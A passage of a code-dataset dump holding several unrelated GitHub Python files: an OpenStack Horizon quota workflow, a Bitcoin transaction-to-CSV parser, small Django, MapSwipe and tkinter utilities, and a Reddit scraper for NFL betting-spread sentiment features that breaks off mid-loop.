limits).\")\n\n\nclass UpdateDefaultVolumeQuotasStep(workflows.Step):\n action_class = UpdateDefaultVolumeQuotasAction\n contributes = quotas.CINDER_QUOTA_FIELDS\n depends_on = ('disabled_quotas',)\n\n def 
prepare_action_context(self, request, context):\n try:\n quota_defaults = cinder.default_quota_get(request,\n request.user.tenant_id)\n for field in quotas.CINDER_QUOTA_FIELDS:\n context[field] = quota_defaults.get(field).limit\n except Exception:\n exceptions.handle(request,\n _('Unable to retrieve default volume quotas.'))\n return context\n\n def allowed(self, request):\n return cinder.is_volume_service_enabled(request)\n\n\nclass UpdateDefaultQuotas(workflows.Workflow):\n slug = \"update_default_quotas\"\n name = _(\"Update Default Quotas\")\n finalize_button_name = _(\"Update Defaults\")\n success_message = _('Default quotas updated.')\n failure_message = _('Unable to update default quotas.')\n success_url = \"horizon:admin:defaults:index\"\n default_steps = (UpdateDefaultComputeQuotasStep,\n UpdateDefaultVolumeQuotasStep)\n","repo_name":"openstack/horizon","sub_path":"openstack_dashboard/dashboards/admin/defaults/workflows.py","file_name":"workflows.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","stars":1314,"dataset":"github-code","pt":"5"} +{"seq_id":"38705480373","text":"from blockchain_parser.blockchain import Blockchain\r\nimport csv\r\nimport json, os, sys, datetime, re\r\nimport plyvel\r\nimport time\r\n\r\n\r\nbitcoinPath = ''\r\nif os.path.exists('/media/sf_Bitcoin/blocks'):\r\n\tbitcoinPath = '/media/sf_Bitcoin' # Virtual machine shared folder\r\nelif os.path.exists('/media/sf_BitcoinVictim/blocks'):\r\n\tbitcoinPath = '/media/sf_BitcoinVictim'\r\nelif os.path.exists('/media/sf_BitcoinAttacker/blocks'):\r\n\tbitcoinPath = '/media/sf_BitcoinAttacker'\r\nelif os.path.exists(f'/media/{os.getlogin()}/BITCOIN/blocks'):\r\n\tbitcoinPath = f'/media/{os.getlogin()}/BITCOIN'\r\nelif os.path.exists(f'/media/{os.getlogin()}/Blockchains/Bitcoin/blocks'):\r\n\tbitcoinPath = f'/media/{os.getlogin()}/Blockchains/Bitcoin'\r\nelif os.path.exists(f'/media/{os.getlogin()}/Long Term Storage/Bitcoin/blocks'):\r\n\tbitcoinPath = f'/media/{os.getlogin()}/Long Term Storage/Bitcoin'\r\n\r\n\r\nbitcoinBlocksPath = os.path.join(bitcoinPath, 'blocks')\r\nbitcoinTxIndexesPath = os.path.join(bitcoinPath, 'indexes/txindex')\r\n\r\noutputDatabaseFileName = os.path.expanduser(os.path.join('~', 'Desktop', 'Bitcoin Transaction Database.csv'))\r\noutputMappingFileName = os.path.expanduser(os.path.join('~', 'Desktop', 'Bitcoin Transaction Mapping Addresses.csv'))\r\n\r\nstartHeight = 0\r\nendHeight = 744578\r\n\r\nif not os.path.exists(bitcoinBlocksPath):\r\n\tprint(bitcoinBlocksPath + ' does not exist.')\r\n\tsys.exit()\r\n\r\nblockchain = Blockchain(os.path.expanduser(bitcoinBlocksPath))\r\ndb = plyvel.DB(bitcoinTxIndexesPath, compression=None)\r\n\r\nepoch = datetime.datetime.utcfromtimestamp(0)\r\ncounter = 0\r\n\r\naddressMap = {}\r\naddressMapCount = 0\r\nsessionResumed = False\r\n\r\ndef resumeSession():\r\n\tglobal outputDatabaseFileName, outputMappingFileName, counter, addressMap, addressMapCount, sessionResumed\r\n\r\n\tprint(' Resuming address mapping...')\r\n\taddressMapFile = open(outputMappingFileName, 'r')\r\n\taddressMapReader = csv.reader(addressMapFile)\r\n\theader = next(addressMapReader)\r\n\tfor row in addressMapReader:\r\n\t\taddressMap[row[1]] = int(row[0])\r\n\t\taddressMapCount += 1\r\n\taddressMapFile.close()\r\n\r\n\tprint(' Reading database to get last line...')\r\n\twith open(outputDatabaseFileName, 'rb') as file:\r\n\t\ttry:\r\n\t\t\tfile.seek(-2, os.SEEK_END)\r\n\t\t\twhile file.read(1) != b'\\n':\r\n\t\t\t\tfile.seek(-2, 
os.SEEK_CUR)\r\n\t\texcept OSError:\r\n\t\t\tfile.seek(0)\r\n\t\tlastLine = file.readline().decode()\r\n\r\n\tlastBlockHeight = lastLine.split(',')[1]\r\n\tprint(' Block height to resume:', lastBlockHeight)\r\n\t# We want to break early in case the block height isn't an int\r\n\tlastBlockHeightInt = int(lastBlockHeight)\r\n\r\n\ttempFileName = outputDatabaseFileName[:-4] + '_TEMP.csv'\r\n\tos.replace(outputDatabaseFileName, tempFileName)\r\n\r\n\tprev_output = open(tempFileName, 'r')\r\n\toutput = open(outputDatabaseFileName, 'w+')\r\n\r\n\t# Removing all old remnants of the last block height so that we can start writing to it fresh\r\n\tprint(' Re-writing database minus the last block height...')\r\n\tline = prev_output.readline()\r\n\twhile line:\r\n\t\tblockHeight = line.split(',')[1]\r\n\r\n\t\tif blockHeight == lastBlockHeight:\r\n\t\t\tbreak\r\n\r\n\t\toutput.write(line)\r\n\t\tline = prev_output.readline()\r\n\r\n\tcounter = lastBlockHeightInt - 1\r\n\r\n\tprev_output.close()\r\n\toutput.close()\r\n\tos.remove(tempFileName)\r\n\tsessionResumed = True\r\n\treturn lastBlockHeightInt\r\n\r\n\r\noutput = None\r\noutputAddressMap = None\r\nif os.path.exists(outputDatabaseFileName) and os.path.exists(outputMappingFileName):\r\n\tresume = input('Previous session found, resume it? (y/n): ').lower() in ['y', 'yes']\r\n\tif resume == False:\r\n\t\tconfirm = input('Are you sure you\\'d like to overwrite this session? (y/n): ').lower() in ['y', 'yes']\r\n\r\n\t\tif confirm == False:\r\n\t\t\tprint('Goodbye.')\r\n\t\t\tsys.exit()\r\n\r\n\t\toutput = open(outputDatabaseFileName, 'w+')\r\n\t\toutputAddressMap = open(outputMappingFileName, 'w+')\r\n\t\toutputAddressMap.write('Primary Key,Address,\\n')\r\n\r\n\telse:\r\n\t\tprint('Resuming session...')\r\n\t\ttry:\r\n\t\t\tstartHeight = resumeSession()\r\n\t\texcept Exception as e:\r\n\t\t\tprint('Failed to resume:', e)\r\n\t\t\tsys.exit()\r\n\t\toutput = open(outputDatabaseFileName, 'a+')\r\n\t\toutputAddressMap = open(outputMappingFileName, 'a+')\r\n\r\n\t\tprint('Successfully resumed session to block height', startHeight)\r\n\t\ttime.sleep(5)\r\n\t\tprint('Beginning in five seconds...')\r\n\t\ttime.sleep(5)\r\nelse:\r\n\toutput = open(outputDatabaseFileName, 'w+')\r\n\toutputAddressMap = open(outputMappingFileName, 'w+')\r\n\toutputAddressMap.write('Primary Key,Address,\\n')\r\n\r\n\r\n\r\ndef mapAddress(address):\r\n\tif address == '*': return '*'\r\n\tglobal addressMap, addressMapCount\r\n\tif address in addressMap:\r\n\t\treturn addressMap[address]\r\n\taddressMap[address] = addressMapCount\r\n\toutputAddressMap.write(f'{addressMap[address]},{address},\\n')\r\n\taddressMapCount += 1\r\n\treturn addressMap[address]\r\n\r\ndef dumpBlock(block):\r\n\tlines = ''\r\n\r\n\tfor tx in block.transactions:\r\n\r\n\t\ttxInputAddresses = ''\r\n\t\ttxOutputAddresses = ''\r\n\r\n\t\tinputValueSum = 0\r\n\t\toutputValueSum = 0\r\n\t\tyoungestAddressIndex = None\r\n\r\n\t\tif tx.is_coinbase():\r\n\t\t\ttxInputAddresses = 'COINBASE'\r\n\r\n\t\telse:\r\n\t\t\tfor _input in tx.inputs:\r\n\t\t\t\tinputHash = _input.transaction_hash\r\n\t\t\t\tinputIndex = _input.transaction_index\r\n\r\n\t\t\t\ttry:\r\n\t\t\t\t\toldtx = blockchain.get_transaction(inputHash, db)\r\n\t\t\t\t\toldtxoutput = oldtx.outputs[inputIndex]\r\n\t\t\t\t\taddresses = oldtxoutput.addresses\r\n\t\t\t\t\taddress = ''\r\n\t\t\t\t\tvalue = oldtxoutput.value\r\n\t\t\t\t\tif len(addresses) < 1:\r\n\t\t\t\t\t\taddress = '*'\r\n\t\t\t\t\t\tprint('INVALID TRANSACTION INPUT')\r\n\t\t\t\t\t\tprint(' TX ' 
+ inputHash)\r\n\t\t\t\t\t\tprint(' TX Output[' + str(inputIndex) + ']')\r\n\t\t\t\t\telif len(addresses) > 1:\r\n\t\t\t\t\t\tprint('MULTIPLE TRANSACTION INPUTs')\r\n\t\t\t\t\t\tprint(' TX ' + inputHash)\r\n\t\t\t\t\t\tprint(' TX Input[' + str(inputIndex) + ']')\r\n\r\n\t\t\t\t\t\taddress = '['\r\n\t\t\t\t\t\tfor a in range(len(addresses)):\r\n\t\t\t\t\t\t\taddress += str(addresses[a].address)\r\n\t\t\t\t\t\t\tif a != len(addresses) - 1:\r\n\t\t\t\t\t\t\t\taddress += ','\r\n\t\t\t\t\t\taddress += ']'\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\taddress = str(addresses[0].address)\r\n\t\t\t\texcept:\r\n\t\t\t\t\taddress = '*'\r\n\t\t\t\t\tvalue = '*'\r\n\r\n\t\t\t\tif address == '*' and value == 0:\r\n\t\t\t\t\tcontinue # Skip OP_RETURN 0\r\n\r\n\t\t\t\taddressIndex = mapAddress(address)\r\n\t\t\t\tinputValueSum += value\r\n\t\t\t\tif addressIndex != '*' and (youngestAddressIndex == None or youngestAddressIndex < addressIndex):\r\n\t\t\t\t\tyoungestAddressIndex = addressIndex\r\n\t\t\t\ttxInputAddresses += str(addressIndex) + ':' + str(value) + ' '\r\n\r\n\t\t\ttxInputAddresses = txInputAddresses.strip()\r\n\t\t# print('Inputs: ', txInputAddresses)\r\n\r\n\t\toutputHash = tx.txid\r\n\t\toutputIndex = 0\r\n\t\tfor _output in tx.outputs:\r\n\t\t\taddresses = _output.addresses\r\n\t\t\taddress = ''\r\n\t\t\tvalue = _output.value\r\n\t\t\tif len(addresses) < 1:\r\n\t\t\t\tif value == 0: continue\r\n\t\t\t\taddress = '*'\r\n\t\t\telif len(addresses) > 1:\r\n\t\t\t\tprint('MULTIPLE TRANSACTION OUTPUTs')\r\n\t\t\t\tprint(' TX ' + outputHash)\r\n\t\t\t\tprint(' TX Output[' + str(outputIndex) + ']')\r\n\r\n\t\t\t\taddress = '['\r\n\t\t\t\tfor a in range(len(addresses)):\r\n\t\t\t\t\taddress += str(addresses[a].address)\r\n\t\t\t\t\tif a != len(addresses) - 1:\r\n\t\t\t\t\t\taddress += ','\r\n\t\t\t\taddress += ']'\r\n\t\t\telse:\r\n\t\t\t\taddress = str(addresses[0].address)\r\n\r\n\t\t\tif address == '*' and value == 0:\r\n\t\t\t\tcontinue # Skip OP_RETURN 0\r\n\r\n\t\t\taddressIndex = mapAddress(address)\r\n\t\t\toutputValueSum += value\r\n\t\t\tif addressIndex != '*' and (youngestAddressIndex == None or youngestAddressIndex < addressIndex):\r\n\t\t\t\tyoungestAddressIndex = addressIndex\r\n\t\t\ttxOutputAddresses += str(addressIndex) + ':' + str(value) + ' '\r\n\t\t\toutputIndex += 1\r\n\r\n\t\ttxOutputAddresses = txOutputAddresses.strip()\r\n\t\t#print('Outputs: ', txOutputAddresses)\r\n\r\n\r\n\t\tline = ''\r\n\t\tline += str((block.header.timestamp - epoch).total_seconds()) + ','\r\n\t\tline += str(block.height) + ','\r\n\t\tline += str(tx.txid) + ','\r\n\t\tline += txInputAddresses + ','\r\n\t\tline += txOutputAddresses + ','\r\n\t\tline += str(inputValueSum) + ','\r\n\t\tline += str(outputValueSum) + ','\r\n\t\tline += str(youngestAddressIndex) + ','\r\n\r\n\t\tlines += line + '\\n'\r\n\r\n\treturn lines\r\n\r\nif sessionResumed == False:\r\n\tline = 'Time Epoch,Block Height,TX ID,Inputs,Outputs,Sum Input Values,Sum Output Values,Youngest Address Index,'\r\n\toutput.write(line + '\\n')\r\n\r\nlastFlushTime = time.time() - 60\r\nfor block in blockchain.get_ordered_blocks(os.path.expanduser(os.path.join(bitcoinBlocksPath + 'index')), start=startHeight, end=endHeight, cache='index-cache.pickle'):\r\n\t#print(dir(block))\r\n\t#print(block.blk_file)\r\n\t#sys.exit()\r\n\r\n\tnow = time.time()\r\n\tif now - lastFlushTime >= 10: # Flush the files every 10 seconds\r\n\t\toutput.flush()\r\n\t\toutputAddressMap.flush()\r\n\t\tprint('Block ' + str(counter) + '\\t' + str(10 * counter / (endHeight - startHeight)) + 
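# --- Illustrative sketch, not part of the dataset record above ---
# mapAddress in the surrounding record interns each address string as an
# incrementing integer key. The same idea without globals: dict.setdefault
# with the current table size as the next id (len(table) is evaluated before
# the insert, so new keys get 0, 1, 2, ...). It mirrors the original's mixed
# return type, passing the parser's '*' marker through untouched.
def intern_address(table: dict, address: str):
    if address == '*':
        return '*'
    return table.setdefault(address, len(table))

table = {}
print(intern_address(table, "addr_a"))  # 0  (hypothetical address strings)
print(intern_address(table, "addr_b"))  # 1
print(intern_address(table, "addr_a"))  # 0 again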
'% Complete')\r\n\t\ttime.sleep(0.1)\r\n\t\tlastFlushTime = now\r\n\r\n\tlines = dumpBlock(block)\r\n\tif(lines):\r\n\t\toutput.write(lines)\r\n\r\n\tcounter += 1\r\n\t\t\r\ndb.close()\r\noutput.close()\r\nprint('Ok.')\r\n","repo_name":"simewu/litecoin_researcher","sub_path":"tools/Litecoin Parser/TX_Bitcoin_to_Database.py","file_name":"TX_Bitcoin_to_Database.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10241724382","text":"import pathlib\n\nfrom mapswipe_workers.definitions import DATA_PATH\n\n\ndef create_directories() -> None:\n \"\"\"Create directories\"\"\"\n dirs = (\n \"/api\",\n \"/api/website-data\",\n \"/api/agg_results\",\n \"/api/groups\",\n \"/api/history\",\n \"/api/hot_tm\",\n \"/api/project_geometries\",\n \"/api/projects\",\n \"/api/results\",\n \"/api/tasks\",\n \"/api/users\",\n \"/api/yes_maybe\",\n )\n\n for dir_name in dirs:\n path = pathlib.Path(DATA_PATH + dir_name)\n # mimicking the POSIX mkdir -p command\n path.mkdir(parents=True, exist_ok=True)\n","repo_name":"mapswipe/python-mapswipe-workers","sub_path":"mapswipe_workers/mapswipe_workers/utils/create_directories.py","file_name":"create_directories.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"5"} +{"seq_id":"44152647175","text":"from django.conf.urls import include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include('facturacion.urls',namespace=\"facturacion\")),\n]\n","repo_name":"joseamaya/tienda","sub_path":"tienda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"71470839831","text":"import json\nimport alloimport\nimport time\nimport uuid\nfrom functools import cmp_to_key\nimport random\nimport utils\n\n\ndef sortkey(a, b, key, coef):\n a = a[key]\n b = b[key]\n if a != None and b != None:\n if isinstance(a, str):\n a = a.lower()\n b = b.lower()\n if a == b: return 0\n try:\n return -1 * coef if (a < b) else 1 * coef\n except:\n y=1\n if a:\n return 1 * coef\n elif b:\n return -1 * coef\n return 0\n\n\nclass ResultSet:\n\n def __init__(self, db, col=[], order=[], set=None, pagesize=-1, page=0):\n self.db=db\n self.id=utils.new_id()\n self.start_time=time.time()\n self.process_time=0\n self.order=order\n self.columns=col\n self.pagesize=pagesize\n self.page=page\n self.data= (set if set else [])\n if set!=None: self.close()\n\n def moustache(self, base={}):\n arr=[]\n for x in self.data:\n arr.append(x.json(self.columns))\n\n return utils.dictassign({\n \"count\" : len(self.data),\n \"time\" : int(self.process_time*1000)/1000,\n \"data\" : arr if self.pagesize<=0 else arr[self.page*self.pagesize:(self.page+1)*self.pagesize],\n \"page\" : self.page,\n \"nperpage\" : self.pagesize,\n \"id\" : self.id,\n \"npages\" : 1 if self.pagesize<=0 else (int(len(self.data)/self.pagesize)+ (1 if len(self.data)%self.pagesize>0 else 0)),\n \"payslist\": alloimport.ID_TO_PAYS\n }, base)\n\n def close(self):\n if self.order and len(self.order)>0:\n key, sens = self.order[0]\n self.data = sorted(self.data, key=cmp_to_key(lambda a, b: sortkey(a, b, key, 1 if sens else -1)))\n self.process_time = time.time() - self.start_time\n return self\n\n\n def 
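# --- Illustrative sketch, not part of the dataset record above ---
# resumeSession in the blockchain-parsing record finds the last CSV row by
# seeking backwards from EOF until it crosses a newline. The same trick as a
# standalone helper:
import os

def last_line(path: str) -> str:
    with open(path, 'rb') as f:
        try:
            f.seek(-2, os.SEEK_END)        # skip the trailing newline byte
            while f.read(1) != b'\n':
                f.seek(-2, os.SEEK_CUR)    # step back past the byte just read
        except OSError:
            f.seek(0)                      # file shorter than one full line
        return f.readline().decode()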
sort(self, key, reverse):\n if key==\"shuffle\":\n random.shuffle(self.data)\n else:\n self.data = sorted(self.data, key=cmp_to_key(lambda a, b: sortkey(a, b, key, 1 if reverse else -1)))\n\n def put(self, row):\n if isinstance(row, (list, tuple)):\n self.data+=row\n else:\n self.data.append(row)\n\n def row_at(self, n):\n return self.data[n]\n\n def __len__(self): return len(self.data)\n\n def __repr__(self):\n return self.__str__()\n\n def __str__(self):\n head=self.db.header.allheader\n out=str(len(self.data))+\" résultats; en \"+str( int(self.process_time*1000000)/1000)+\" ms\\n\"\n out+=str(self.db.header.format(head))+\"\\n\"\n for x in self.data:\n out+=x.format(head)+\"\\n\"\n return out","repo_name":"FrancoisGautrais/AlloDB","sub_path":"resultset.py","file_name":"resultset.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31157585166","text":"from __future__ import absolute_import, division\n\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom os.path import exists, join, isdir\nfrom model.ThreeDimModel import ThreeDimModel\n\n\nclass InferenceFrame(tk.LabelFrame):\n def __init__(self, master=None):\n tk.LabelFrame.__init__(self, master)\n self.grid()\n self.model3D = ThreeDimModel()\n self.model_folder = tk.StringVar()\n self.data_folder = tk.StringVar()\n self.out_folder = tk.StringVar()\n\n self.generate_widgets()\n\n def generate_widgets(self):\n self.model_folder_button = tk.Button(\n self, text=\"Select a model\", command=self.model_folder_setter)\n self.data_folder_button = tk.Button(\n self, text=\"Select an input folder\", command=self.data_folder_setter)\n self.out_folder_button = tk.Button(\n self, text=\"Select an output folder\", command=self.output_folder_setter)\n self.model_folder_label = tk.Label(self, text=\"\", width=70, bg='red')\n self.data_folder_label = tk.Label(self, text=\"\", width=70, bg='red')\n self.out_folder_label = tk.Label(self, text=\"\", width=70, bg='red')\n self.big_button = tk.Button(\n self, text=\"Launch Inference\", command=self.launch_inference)\n self.model_folder_button.grid(row=0, column=0)\n self.out_folder_button.grid(row=2, column=0)\n self.data_folder_button.grid(row=1, column=0)\n self.model_folder_label.grid(row=0, column=1)\n self.data_folder_label.grid(row=1, column=1)\n self.out_folder_label.grid(row=2, column=1)\n self.big_button.grid(row=3, column=0, columnspan=2, sticky=tk.E + tk.W)\n\n def model_folder_setter(self):\n self.model_folder.set(filedialog.askdirectory(\n title=\"Select a model folder\"))\n self.model_folder_label.configure(text=self.model_folder.get())\n if exists(join(self.model_folder.get(), 'properties.json')):\n self.model_folder_label.configure(bg='green')\n self.model3D.load(self.model_folder.get())\n else:\n self.model_folder_label.configure(bg='red')\n\n def data_folder_setter(self):\n self.data_folder.set(filedialog.askdirectory(\n title='Select an input data folder'))\n self.data_folder_label.configure(text=self.data_folder.get())\n if isdir(join(self.data_folder.get(), 'RGB')):\n self.data_folder_label.configure(bg='green')\n else:\n self.data_folder_label.configure(bg='red')\n\n def output_folder_setter(self):\n self.out_folder.set(filedialog.askdirectory(\n title='Select an output directory'))\n self.out_folder_label.configure(text=self.out_folder.get())\n if self.out_folder.get():\n self.out_folder_label.configure(bg='green')\n else:\n self.out_folder_label.configure(bg='red')\n\n def 
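# --- Illustrative sketch, not part of the dataset record above ---
# The sortkey/cmp_to_key pair in the surrounding record exists mostly to order
# rows whose key may be None or mixed-case strings. A key-function equivalent;
# note None sorts last here, which differs slightly from the comparator's tie
# rules, and it assumes each column holds a single comparable type.
def none_safe_key(value):
    if value is None:
        return (1, '')
    if isinstance(value, str):
        return (0, value.lower())
    return (0, value)

rows = [{'name': 'b'}, {'name': None}, {'name': 'A'}]
print(sorted(rows, key=lambda r: none_safe_key(r['name'])))
# [{'name': 'A'}, {'name': 'b'}, {'name': None}]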
launch_inference(self):\n if self.model_folder.get() and self.out_folder.get() and self.data_folder.get():\n self.model3D.compute(self.data_folder.get(), self.out_folder.get())\n","repo_name":"EtienneHouze/GUI_Learning","sub_path":"Python/gui/InferenceFrame.py","file_name":"InferenceFrame.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16077133317","text":"import numpy as np\nimport pandas as pd\nimport praw\nimport psaw\nfrom tinydb import TinyDB, Query\nimport datetime\nimport time\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom nltk.stem.snowball import SnowballStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB, GaussianNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import LinearSVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom sklearn.linear_model import LogisticRegression, LinearRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.decomposition import SparsePCA, PCA\nfrom sklearn.model_selection import KFold\nimport matplotlib.pyplot as plt\nfrom afinn import Afinn\nfrom keras.layers import Dense, LSTM, Dropout\nfrom keras.layers.convolutional import Conv2D\nfrom keras.wrappers.scikit_learn import KerasClassifier\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\"\"\" CONFIGURATION \"\"\"\n\n# PRAW + PSAW configuration\nreddit = praw.Reddit(client_id=secrets.CLIENT_ID,\n client_secret=secrets.CLIENT_SECRET,\n user_agent=secrets.USERAGENT\n )\nprint(\"Read only:\", reddit.read_only)\nps = psaw.PushshiftAPI(reddit)\n\n# directory for data (from sportsline)\nDATA_PATH = \"XXXX\"\ndf = pd.read_csv(DATA_PATH)\n\n# return top 100 submissions from given time window and subreddit\ndef sub_query(team, d1, d2):\n start_epoch = time.mktime(d1.timetuple())\n end_epoch = time.mktime(d2.timetuple())\n submissions = list(ps.search_submissions(after=int(start_epoch),\n before=int(end_epoch),\n sort='desc',\n sort_type='score',\n subreddit=str(team),\n limit=100))\n if len(submissions) < 1:\n print(\"NO SUBMISSIONS COLLECTED\", team)\n sub_dict = []\n for sub in submissions:\n thisdict = {\n \"id\": sub.id,\n \"title\": sub.title,\n \"score\": sub.score\n }\n sub_dict.append(thisdict)\n return sub_dict\n\n# queries top 100 comments from given time window and subreddit\ndef com_query(team, d1, d2):\n start_epoch = time.mktime(d1.timetuple())\n end_epoch = time.mktime(d2.timetuple()) \n comments = list(ps.search_comments(after=int(start_epoch),\n before=int(end_epoch),\n sort='desc',\n sort_type='score',\n subreddit=str(team),\n limit=100))\n if len(comments) < 1:\n print(\"NO COMMENTS COLLECTED\", team)\n comment_dict= []\n for com in comments:\n thisdict = {\n \"id\": com.id,\n \"body\":com.body,\n \"score\":com.score\n }\n comment_dict.append(thisdict)\n return comment_dict\n\n\n# dictionaries for NFL team names\nteam_dict1 = {\n \"San Francisco 49ers\": \"49ers\",\n \"Arizona Cardinals\": \"AZCardinals\",\n \"Cincinnati Bengals\": \"bengals\",\n \"Cleveland Browns\": \"Browns\",\n \"Tampa Bay Buccaneers\": \"buccaneers\",\n \"Buffalo Bills\": \"buffalobills\",\n \"Los Angeles Chargers\": 
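# --- Illustrative sketch, not part of the dataset record above ---
# sub_query/com_query in the Reddit-scraping record turn a date window into
# the integer epochs that psaw's search_* calls expect. The conversion in
# isolation (time.mktime interprets the struct_time in local time, as in the
# original):
import datetime
import time

def epoch_window(end_date: datetime.datetime, days: int):
    start = end_date - datetime.timedelta(days=days)
    return int(time.mktime(start.timetuple())), int(time.mktime(end_date.timetuple()))

after, before = epoch_window(datetime.datetime(2019, 9, 8), days=7)
print(after, before)  # local-time epochs for 2019-09-01 .. 2019-09-08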
\"Chargers\",\n \"San Diego Chargers\": \"Chargers\",\n \"Chicago Bears\": \"CHIBears\",\n \"Indianapolis Colts\": \"Colts\",\n \"Dallas Cowboys\": \"cowboys\",\n \"Denver Broncos\": \"DenverBroncos\",\n \"Detroit Lions\": \"detroitlions\",\n \"Philadelphia Eagles\": \"eagles\",\n \"Atlanta Falcons\": \"falcons\",\n \"Green Bay Packers\": \"GreenBayPackers\",\n \"Jacksonville Jaguars\": \"Jaguars\",\n \"Kansas City Chiefs\": \"KansasCityChiefs\",\n \"Los Angeles Rams\": \"losangelesrams\",\n \"Miami Dolphins\": \"miamidolphins\",\n \"Minnesota Vikings\": \"minnesotavikings\",\n \"New York Giants\": \"NYGiants\",\n \"New York Jets\": \"nyjets\",\n \"Oakland Raiders\": \"oaklandraiders\",\n \"Carolina Panthers\": \"panthers\",\n \"New England Patriots\": \"Patriots\",\n \"Baltimore Ravens\": \"ravens\",\n \"Washington Redskins\": \"Redskins\",\n \"New Orleans Saints\": \"Saints\",\n \"Seattle Seahawks\": \"Seahawks\",\n \"Pittsburgh Steelers\": \"steelers\",\n \"St. Louis Rams\": \"StLouisRams\",\n \"Tennessee Titans\": \"Tennesseetitans\",\n \"Houston Texans\": \"Texans\"\n\t}\nteam_dict2 = {\n \"SF\": \"49ers\",\n \"ARI\": \"AZCardinals\",\n \"CIN\": \"bengals\",\n \"CLE\": \"Browns\",\n \"TB\": \"buccaneers\",\n \"BUF\": \"buffalobills\",\n \"LAC\": \"Chargers\",\n \"CHI\": \"CHIBears\",\n \"IND\": \"Colts\",\n \"DAL\": \"cowboys\",\n \"DEN\": \"DenverBroncos\",\n \"DET\": \"detroitlions\",\n \"PHI\": \"eagles\",\n \"ATL\": \"falcons\",\n \"GB\": \"GreenBayPackers\",\n \"JAX\": \"Jaguars\",\n \"KC\": \"KansasCityChiefs\",\n \"LAR\": \"losangelesrams\",\n \"MIA\": \"miamidolphins\",\n \"MIN\": \"minnesotavikings\",\n \"NYG\": \"NYGiants\",\n \"NYJ\": \"nyjets\",\n \"OAK\": \"oaklandraiders\",\n \"CAR\": \"panthers\",\n \"NE\": \"Patriots\",\n \"BAL\": \"ravens\",\n \"WAS\": \"Redskins\",\n \"NO\": \"Saints\",\n \"SEA\": \"Seahawks\",\n \"PIT\": \"steelers\",\n \"RAM\": \"StLouisRams\",\n \"TEN\": \"Tennesseetitans\",\n \"HOU\": \"Texans\"\n }\n\n\n\"\"\" DATA COLLECTION \"\"\"\n\nDELTA = 7 # time window\n\n# scrape relevant text for each game from Reddit\ndf['schedule_date'] = pd.to_datetime(df['schedule_date'])\ndf['home_submissions'] = \"\"\ndf['away_submissions'] = \"\"\ndf['home_comments'] = \"\"\ndf['away_comments'] = \"\"\ndf['home_wts'] = \"\"\nfor i, row in df.iterrows():\n date = df['schedule_date'][i] \n home = team_dict1[df['team_home'][i]]\n away = team_dict1[df['team_away'][i]]\n year = date.year\n \n # rams city change\n if year < 2016 and df['team_favorite_id'][i] == \"LAR\":\n df['team_favorite_id'][i] = \"RAM\"\n \n print(\"Processing row \", i, \":\", home, \" @ \", away, date)\n df['home_submissions'][i] = sub_query(home, date - datetime.timedelta(days=DELTA), date)\n df['home_comments'][i] = com_query(home, date - datetime.timedelta(days=DELTA), date)\n df['away_submissions'][i] = sub_query(away, date - datetime.timedelta(days=DELTA), date)\n df['away_comments'][i] = com_query(away, date - datetime.timedelta(days=DELTA), date)\n\n# saves scraped data\ndf.to_pickle('data7')\ndf = pd.read_pickle('data7')\n\n# instance\nscaler = StandardScaler()\ntokenizer = RegexpTokenizer(r'\\w+')\nlemmatizer = WordNetLemmatizer()\nstop_words = set(stopwords.words('english'))\nstemmer = SnowballStemmer(\"english\")\nvectorizer = CountVectorizer()\nanalyzer = SentimentIntensityAnalyzer()\ntransformer = TfidfTransformer(smooth_idf=False)\nafinn_analyzer = Afinn()\n\n# preprocess text\ndef preprocess(text):\n tokens = tokenizer.tokenize(text.lower()) #split into tokens\n tokens = [token for 
token in tokens if not token.isdigit()] # remove numbers\n    tokens = [token for token in tokens if len(token) > 3] # remove short tokens (3 characters or fewer)\n    tokens = [token for token in tokens if not token in stop_words] # remove stop words\n    # tokens = [stemmer.stem(token) for token in tokens] # \"stem\" words\n    string = \"\"\n    for token in tokens:\n        string = \" \".join([string, token])\n    return string\n\n\"\"\" FEATURE ENGINEERING \"\"\"\n\nhome_corpus = []\naway_corpus = []\nhome_vader = []\naway_vader = []\nhome_afinn = []\naway_afinn = []\ntemp = []\ndf['home_wts'] = '' # 1 for home team wins the spread, 0 for away\ndf['above_ou'] = '' # 1 for above, 0 for under\n\n# extract features from scraped text\nfor i in range(df.shape[0]):\n    # remove empty rows\n    if len(df['home_comments'][i]) == 0 or len(df['away_comments'][i])==0:\n        df = df.drop([i], axis=0)\n        continue\n    \n    home = team_dict1[df['team_home'][i]]\n    away = team_dict1[df['team_away'][i]]\n\n    # determine WTS outcome\n    spread = df['spread_favorite'][i]\n    if df['team_favorite_id'][i] != 'PICK':\n        favored = team_dict2[df['team_favorite_id'][i]]\n        # calculate point spread\n        if away == favored:\n            spread = -1*spread # away team is favored\n    game_spread = df['score_home'][i]-df['score_away'][i]\n    if game_spread + spread > 0:\n        df['home_wts'][i] = 1 # home team covered the spread\n    elif 